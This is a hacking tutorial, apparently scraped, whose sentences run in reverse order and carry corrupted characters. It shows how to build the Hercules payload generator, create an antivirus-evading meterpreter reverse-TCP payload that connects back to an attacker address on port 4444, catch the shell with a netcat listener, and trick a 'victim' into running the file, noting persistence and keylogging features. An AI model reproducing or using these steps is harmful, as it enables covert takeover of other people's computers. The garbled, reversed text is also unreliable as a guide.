So let’s add a little bit reality to our payload this time. But this is a one time session, which means once you get out of this session you are disconnected from your victim. Type command help to see all the commands we can execute on our target system.įor example, type command systeminfo to see all the system settings of our target. Now when the user clicks on our payload, we will get the remote system’s shell as shown below. We are opening a netcat session on port 4444 ( the same port we set up above). On our Kali Linux, type command nc -l -p 4444. Now send this file to our victim using your creativity. Our payload is created in the same directory. l – linking ( static or dynamic, dynamic linking reduces the payload size )
#Hack someones pc with netcat windows 64 bits#
a – architecture of the payload ( 64 bits or 32 bits )
p – payload ( in this case, windows/meterpreter/reverse_tcp )
HERCULES 192.168.25.146 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamicġ92.168.25.146 – IP address of our attacker system ( in our case Kali Linux )Ĥ444 – the port number over which we want our victim system to connect to us. Once you run that command, we will get another file with the same name but without any extension as shown below. Remember Linux is very strict, so be careful with uppercase and lowercase. Now type command go build HERCULES.go to build this file. There should be a file called HERCULES.go. Navigate into that directory and view the contents of the directory as shown below. The tool is cloned into directory called Hercules. In Kali Linux, open a terminal and type command git clone to clone Hercules into Kali Linux. Now let us see how Hercules can be used to hack Windows 10. In our testing, none of the antivirus was able to detect payload generated by Hercules. Named after a Greek Hero, Hercules stands up for its name. It has features like persistence and keylogger which make it too cool.
#Hack someones pc with netcat windows generator#
Hercules is a special payload generator that can bypass all antivirus software. The biggest challenge in sending these malicious portable executables is bypassing its security mechanisms. Since remote exploits ceased to exist in Windows operating systems after Windows XP, it can only be done by sending payloads in portable executables. Today we will learn about a payload generator that I used in hacking Windows 10 (actually of its antivirus ).